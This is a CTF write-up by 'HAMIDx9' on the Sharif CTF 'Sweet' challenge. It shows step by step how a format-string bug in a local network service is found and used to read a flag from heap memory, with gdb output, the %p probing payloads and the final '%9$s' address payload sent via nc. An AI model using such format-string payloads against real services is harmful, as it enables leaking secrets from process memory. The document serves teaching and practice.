Hey,

another write-up. It is about second Sharif CTF exploting that called Sweet and had 200 Point.

Like the previous one it requires one arguement to specify port number.

Let me ...

# ls
sweet.tar.gz
# tar zxf sweet.tar.gz 
# ls
sweet  sweet.tar.gz
# chmod +x sweet
# ./sweet 8888
ERROR opening flag file!: No such file or directory
# 

mmm, Interesting, take a note this one ;)

# echo HAMIDx9 > flag.txt
# ./sweet 8888

after some testing i saw that it has a FMT vulnerability on input. So ...

# nc 127.0.0.1 8888
HAMIDx9
You wrote: HAMIDx9

# nc 127.0.0.1 8888
HAMIDx9%p%p%p
You wrote: HAMIDx90xb777b8900xb777af640x804921c

Ok, It seems i can read any memory location, so my scenario is reading the key flag on the memory. But where should i read? let me check the binary :

# gdb ./sweet -q
Reading symbols from /home/hamidx9/developing/sharif-ctf/sweet-ctf/sweet...(no debugging symbols found)...done.
gdb-peda$ pdisass main
Dump of assembler code for function main:
   0x08048ae1 <+0>: push   %ebp
   0x08048ae2 <+1>: mov    %esp,%ebp
[..snip..]
   0x08048b21 <+64>:    movl   $0x1,0x4(%esp)
   0x08048b29 <+72>:    mov    %eax,(%esp)
   0x08048b2c <+75>:    call   0x8048974 <fwrite@plt>
   0x08048b31 <+80>:    movl   $0x1,(%esp)
   0x08048b38 <+87>:    call   0x80489f4 <exit@plt>
   0x08048b3d <+92>:    movl   $0x8049169,(%esp)
   0x08048b44 <+99>:    call   0x8048fb5 <readfile>
   0x08048b49 <+104>:   mov    %eax,%edx
[..snip..]
   0x08048de9 <+776>:   mov    %eax,(%esp)
   0x08048dec <+779>:   call   0x8048964 <close@plt>
   0x08048df1 <+784>:   jmp    0x8048d30 <main+591>
End of assembler dump.
gdb-peda$ x/s 0x8049169
0x8049169:   "flag.txt"

As you can see readfile requires a parameter as file name. Analysing the readfile function shows that at the end of reading flag.txt file it stores the address of obtained chars from the file to %eax.

So if i set a breakpoint on the *main+99 and then continue to the next instruction i have the stored address. At here it is :

gdb-peda$ b *main+99
Breakpoint 1 at 0x8048b44
gdb-peda$ r 8888
[----------------------------------registers-----------------------------------]
EAX: 0x0 
EBX: 0xb7fb6ff4 --> 0x15ed7c 
ECX: 0xe9c66826 
EDX: 0x2 
ESI: 0x0 
EDI: 0x0 
EBP: 0xbffff308 --> 0xbffff388 --> 0x0 
ESP: 0xbffff200 --> 0x8049169 ("flag.txt")
EIP: 0x8048b44 (<main+99>:  call   0x8048fb5 <readfile>)
EFLAGS: 0x202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x8048b31 <main+80>: movl   $0x1,(%esp)
   0x8048b38 <main+87>: call   0x80489f4 <exit@plt>
   0x8048b3d <main+92>: movl   $0x8049169,(%esp)
=> 0x8048b44 <main+99>: call   0x8048fb5 <readfile>
   0x8048b49 <main+104>:    mov    %eax,%edx
   0x8048b4b <main+106>:    mov    $0x804b0c0,%eax
   0x8048b50 <main+111>:    movl   $0x80,0x8(%esp)
   0x8048b58 <main+119>:    mov    %edx,0x4(%esp)
No argument
[------------------------------------stack-------------------------------------]
0000| 0xbffff200 --> 0x8049169 ("flag.txt")
0004| 0xbffff204 --> 0xb7fea562 (movl   $0x0,0x894(%ebx))
0008| 0xbffff208 --> 0xb7fbb000 
0012| 0xbffff20c --> 0x2305e 
0016| 0xbffff210 --> 0xb7ffeff4 --> 0x1cf2c 
0020| 0xbffff214 --> 0xbffff31c --> 0xb7fe0860 --> 0xb7e58000 --> 0x464c457f 
0024| 0xbffff218 --> 0xb7e5be04 --> 0x0 
0028| 0xbffff21c --> 0xb7ffadf8 ("symbol=%s;  lookup in file=%s [%lu]\n")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 1, 0x08048b44 in main ()
gdb-peda$ ni
[----------------------------------registers-----------------------------------]
EAX: 0x804c170 ("HAMIDx9\n")
EBX: 0xb7fb6ff4 --> 0x15ed7c 
ECX: 0x804c0a0 --> 0x0 
EDX: 0x8 
ESI: 0x0 
EDI: 0x0 
EBP: 0xbffff308 --> 0xbffff388 --> 0x0 
ESP: 0xbffff200 --> 0x8049169 ("flag.txt")
EIP: 0x8048b49 (<main+104>: mov    %eax,%edx)
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x8048b38 <main+87>: call   0x80489f4 <exit@plt>
   0x8048b3d <main+92>: movl   $0x8049169,(%esp)
   0x8048b44 <main+99>: call   0x8048fb5 <readfile>
=> 0x8048b49 <main+104>:    mov    %eax,%edx
   0x8048b4b <main+106>:    mov    $0x804b0c0,%eax
   0x8048b50 <main+111>:    movl   $0x80,0x8(%esp)
   0x8048b58 <main+119>:    mov    %edx,0x4(%esp)
   0x8048b5c <main+123>:    mov    %eax,(%esp)
[------------------------------------stack-------------------------------------]
0000| 0xbffff200 --> 0x8049169 ("flag.txt")
0004| 0xbffff204 --> 0xb7fea562 (movl   $0x0,0x894(%ebx))
0008| 0xbffff208 --> 0xb7fbb000 
0012| 0xbffff20c --> 0x2305e 
0016| 0xbffff210 --> 0xb7ffeff4 --> 0x1cf2c 
0020| 0xbffff214 --> 0xbffff31c --> 0xb7fe0860 --> 0xb7e58000 --> 0x464c457f 
0024| 0xbffff218 --> 0xb7e5be04 --> 0x0 
0028| 0xbffff21c --> 0xb7ffadf8 ("symbol=%s;  lookup in file=%s [%lu]\n")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x08048b49 in main ()
gdb-peda$ 

So the address is : 0x0804c170 As you can see if i go further into readfile function, it shows it has used malloc to stores the flag.txt contents. So the string is on the HEAP :

# cat /proc/19563/maps 
08048000-0804a000 r-xp 00000000 08:04 3560883    /home/hamidx9/developing/sharif-ctf/sweet-ctf/sweet
0804a000-0804b000 r--p 00001000 08:04 3560883    /home/hamidx9/developing/sharif-ctf/sweet-ctf/sweet
0804b000-0804c000 rw-p 00002000 08:04 3560883    /home/hamidx9/developing/sharif-ctf/sweet-ctf/sweet
0804c000-0806d000 rw-p 00000000 00:00 0          [heap]
b7e57000-b7e58000 rw-p 00000000 00:00 0 
b7e58000-b7fb4000 r-xp 00000000 08:02 131506     /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b7fb4000-b7fb5000 ---p 0015c000 08:02 131506     /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b7fb5000-b7fb7000 r--p 0015c000 08:02 131506     /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b7fb7000-b7fb8000 rw-p 0015e000 08:02 131506     /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b7fb8000-b7fbb000 rw-p 00000000 00:00 0 
b7fde000-b7fe1000 rw-p 00000000 00:00 0 
b7fe1000-b7fe2000 r-xp 00000000 00:00 0          [vdso]
b7fe2000-b7ffe000 r-xp 00000000 08:02 131542     /lib/i386-linux-gnu/ld-2.13.so
b7ffe000-b7fff000 r--p 0001b000 08:02 131542     /lib/i386-linux-gnu/ld-2.13.so
b7fff000-b8000000 rw-p 0001c000 08:02 131542     /lib/i386-linux-gnu/ld-2.13.so
bffdf000-c0000000 rw-p 00000000 00:00 0          [stack]

Ok It's time to read the 0x0804c170 contents by our arbitary input. First of all i must find the offset on the Format String Vulnerability function :

# python -c 'print "AAAA"+".%p"*50' | nc 127.0.0.1 8888
You wrote: AAAA.0xb7fff890.0xb7ffef64.0x804921c.0xbffff0f0.0xbffff2dc.0x2305e.0x804b0c0.0x9b.0x41414141.0x6278302e.0x66666637.0x2e303938.0x37627830.0x66656666.0x302e3436.0x34303878.0x63313239.0x6278302e.0x66666666.0x2e306630.0x66627830.0x32666666.0x302e6364.0x30333278.0x302e6535.0x34303878.0x30633062.0x3978302e.0x78302e62.0x31343134.0x31343134.0x3678302e.0x33383732.0x2e653230.0x36367830.0x36363636.0x302e3733.0x33653278.0x33393330.0x78302e38.0x32363733.0x30333837.0x3678302e.0x36353636.0x2e363636.0x30337830.0x34336532.0x302e3633.0x33343378.0x37383330

So the offset is : 9

At last i should read my memory with the following trick :

# python -c 'print "\x70\xc1\x04\x08"+"%9$s"' | nc 127.0.0.1 8888
[Connection 127.0.0.1:56806]
You wrote: p�HAMIDx9

So there we go ;)

Interesting level. but i still think it was so easy to gain 200 point.

Regards, HAMIDx9

Comments